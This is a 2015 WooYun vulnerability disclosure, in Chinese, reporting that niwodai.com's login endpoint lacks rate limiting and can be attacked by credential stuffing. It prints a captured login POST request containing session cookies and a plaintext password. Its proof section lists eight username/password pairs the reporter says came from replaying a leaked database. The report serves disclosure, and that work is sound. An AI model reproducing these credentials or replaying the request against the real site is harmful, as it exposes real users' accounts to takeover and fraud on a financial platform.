当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112529

漏洞标题:某接口撞库泄露用户登录凭据(有批量账号证明)

相关厂商:你我贷

漏洞作者: 路人甲

提交时间:2015-05-20 16:22

修复时间:2015-07-04 16:24

公开时间:2015-07-04 16:24

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

撞库扫号攻击已经是Top 10 Security Risks for 2014之一.撞库以大量的用户数据为基础,利用用户相同的注册习惯(相同的用户名和密码),尝试登陆其它的网站。2011年,互联网泄密事件引爆了整个信息安全界,导致传统的用户+密码认证的方式已无法满足现有安全需求。泄露数据包括:天涯:31,758,468条,CSDN:6,428,559条,微博:4,442,915条,人人网:4,445,047条,猫扑:2,644,726条,178:9,072,819条,嘟嘟牛:13,891,418条,7K7K:18,282,404条,共1.2亿条。不管你的网站密码保护的多好,但是面对已经泄露的账号密码,撞库扫号防御还是一个相当重要的环节。

详细说明:

这个厂商貌似没注册。p2p金融,alexa 排名19000左右。
主站登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号。 可以暴力破解,可以撞库登录接口抓包如下:

POST /index.do?method=doLoginAction1 HTTP/1.1
Host: member.niwodai.com
Connection: close
Content-Length: 73
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://member.niwodai.com
X-Requested-With: XMLHttpRequest
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://member.niwodai.com/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: NIWODAI_NMS_TOKEN=cjfkbndqbiibhwfcauihdvjthgbpjtakfqirjifeiijiadjnenjobthwcbgnihcniydxgtesidadcpcieobjgvfycjfn; AMCV_EC4B899B546363EB0A4C98BC%40AdobeOrg=-1506950487%7CMCMID%7C10768350098833372033650238385228233747%7CMCAID%7CNONE%7CMCAAMLH-1431519636%7C11%7CMCAAMB-1431519636%7Chmk_Lq6TPIBMW925SPhw3Q; mbox=session#1430914836115-268808#1430916697|PC#1430914836115-268808.24_12#1432124440; Hm_lvt_07a46b3334ec7a3ee842220da913bf07=1430914840; Hm_lpvt_07a46b3334ec7a3ee842220da913bf07=1430914840; _ga=GA1.2.256066676.1430914840; _gat=1; AMCV_niwodai%40AdobeOrg=-1506950487%7CMCMID%7C57952530539798130570153295089574167701%7CMCAAMLH-1431519640%7C11%7CMCAID%7CNONE; s_cmp=baidutz%7Ccpc%7Cna%7Cna%7Cna%7Csem-bd02-test-1; s_ev16=%5B%5B%27baidutz%257Ccpc%27%2C%271430914841350%27%5D%5D; s_ev17=%5B%5B%27baidutz%257Ccpc%27%2C%271430914841351%27%5D%5D; NIWODAI_NMS_TOKEN_SECURE=cjfkbndqbiibhwfcauihdvjthgbpjtakfqirjifeiijiadjnenjobthwcbgnihcniydxgtesidadcpcieobjgvfycjfn; uco=; ucpo=; _fmdata=064B772F4E2BCBC400BE34341D6F4DDB929988D183D0175A388F80F24AAE6E6A73F1FA0C376C840441AA1D740809E18A217AACAEF57DEF4C; s_sq=%5B%5BB%5D%5D; s_cc=true; s_sm=na%7Cna; s_nr=1430914890588-New; JSESSIONID=A6F7EEC4A77063242A1AB22981023419; [email protected]
RA-Ver: 2.10.0
RA-Sid: 7B9DD012-20150303-080129-82895f-fb68a9
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
codeType=0&username=yb1103&pwd=261511451&imgCode=&phoneCode=&saveUname=on

漏洞证明:

经过测试发现,使用某泄露数据库可以碰撞获得有效的登录账号.

pilipaca	85798579
dmker	aa007502
qtgood	goodking
pc12345	pc123456
zxczxczxc	zxczxczxc
lht74	lht237lht
hi123456789	123456789
yb1103	261511451


屏幕快照 2015-05-06 下午9.03.45.png


屏幕快照 2015-05-06 下午9.01.42.png

修复方案:

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝